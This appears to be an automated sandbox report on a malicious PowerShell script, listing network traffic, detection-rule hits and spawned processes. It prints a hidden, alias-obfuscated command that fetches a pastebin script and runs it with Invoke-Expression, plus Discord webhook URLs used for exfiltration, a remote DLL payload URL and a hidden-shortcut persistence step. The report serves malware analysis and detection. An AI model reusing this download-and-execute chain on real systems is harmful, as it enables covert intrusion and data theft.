Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 212Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:09:29 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008570x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tPU45jbVqRzXWc0%2FFq%2B7AJ88FW84qjEFx%2B%2F%2FUF7FPYvkcr7aHwO7CmIIbqFEEHgpxVPdQHefdloIUf65dz2TjSLht1hphsOfqR%2FlgEj9LY63tyx%2Fo5iC26xsk%2Fxf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=65fa831c604bb30fa32a4e69b952d43ada3212e3-1729008569; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=c2J6VaxxOcGhDuXpF3_leOIkP.luEMUHEOWHebvmk_k-1729008569422-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3112e5b8276b1d-DFW{"message": "Unknown Webhook", "code": 10015}
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:09:43 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008584x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yks24Qeo%2FvBVTLCpbdYi4G3bgPxTNaAKqq0%2FJ4ASqsj9YqtloAPKaTkF79Nq%2FkQ41z9wcmxq3Jfk%2FCi3bJ1bPHSF7mAll7IbaBiUIVy8YfYGgoR%2F2dWMt9oc8%2BGP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=4d52b112f98ae2b2397b9d020ae0cb949a5a48fd-1729008583; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=PcsxqrxpptZzN02y_GtOmwOFT__Cp0NcNIOVR0y4N30-1729008583016-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d31133b4cea28d1-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:09:51 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008592x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TDvtvwecEXbhzrdCAcXbH9BbCNfmjQM5E4VmY2jx3acihMaT5yUBx2r9F78KZ8HeuwtKyfRjZv81%2BU4tJMDKSeW6jiTNnPozxPH15C9pP2vn4afw9Nhf7Qw7fhlI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=405b83809d3638731d6709738a2f99d9ef520ffb-1729008591; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=L6KffKQGrwN_zOxVH.tSRjO4bmSPr08MscyZpWQByCw-1729008591608-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3113707ee62cd4-DFW
Source: powershell.exe, 00000000.00000002.1787154201.000001AC21519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsPL
Source: powershell.exe, 00000000.00000002.1757798711.000001AC095B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D8525C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2F33F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000000.00000002.1778027184.000001AC18FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778027184.000001AC190E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.1945760008.0000012D84726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D841B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D8470A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E8EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E44E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000F.00000002.2032175915.000001CA2E44E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000000.00000002.1757798711.000001AC091AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.1945760008.0000012D847D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D847A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E9B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000F.00000002.2032175915.000001CA2E989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000000.00000002.1757798711.000001AC08F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D83D34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2DEED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1757798711.000001AC091AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1786911868.000001AC21300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984040805.0000012D9BFB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1757798711.000001AC08F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D83D0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D83CF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2DEED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2DEB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1778027184.000001AC190E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1778027184.000001AC190E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1778027184.000001AC190E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1757798711.000001AC095A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D8525C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2F33F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000000.00000002.1787154201.000001AC21493000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757798711.000001AC09155000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757798711.000001AC091AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757798711.000001AC095B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757798711.000001AC095A2000.00000004.00000800.00020000.00000000.sdmp, cr_asm_menu..ps1String found in binary or memory: https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpT
Source: powershell.exe, 0000000B.00000002.1945760008.0000012D8525C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2F33F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/129575196622756
Source: powershell.exe, 0000000B.00000002.1945760008.0000012D8483D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2EA66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGM
Source: powershell.exe, 0000000F.00000002.2032175915.000001CA2EA66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2EA26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2F33F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2EA62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2EA58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E92A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewv
Source: powershell.exe, 00000000.00000002.1757798711.000001AC091AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1757798711.000001AC0A018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D841B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E44E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 0000000B.00000002.1982642012.0000012D9BE28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsm
Source: powershell.exe, 00000000.00000002.1778027184.000001AC18FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778027184.000001AC190E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000B.00000002.1945760008.0000012D84712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E8F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000B.00000002.1945760008.0000012D8470A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D84712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E8EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000B.00000002.1945760008.0000012D847D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E9B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000000.00000002.1757798711.000001AC09155000.00000004.00000800.00020000.00000000.sdmp, cr_asm_menu..ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll
Source: powershell.exe, 0000000B.00000002.1945760008.0000012D84726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D8474E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49918 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49926 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.9:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49964 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.9:49976 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49983 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49984 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_1172.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_1796.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1172, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1796, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887ADE7E60_2_00007FF887ADE7E6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887ADF5920_2_00007FF887ADF592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887AEC71211_2_00007FF887AEC712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887AEB96611_2_00007FF887AEB966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887AED1B111_2_00007FF887AED1B1
Source: amsi64_1172.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_1796.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1172, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1796, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal88.troj.expl.evad.winPS1@20/21@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0qxq1t3.dni.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_menu..ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\r422pnl3\CSC544D18D68EB4FCE8319BF18EEFBBF9E.TMP"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\r422pnl3\CSC544D18D68EB4FCE8319BF18EEFBBF9E.TMP"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
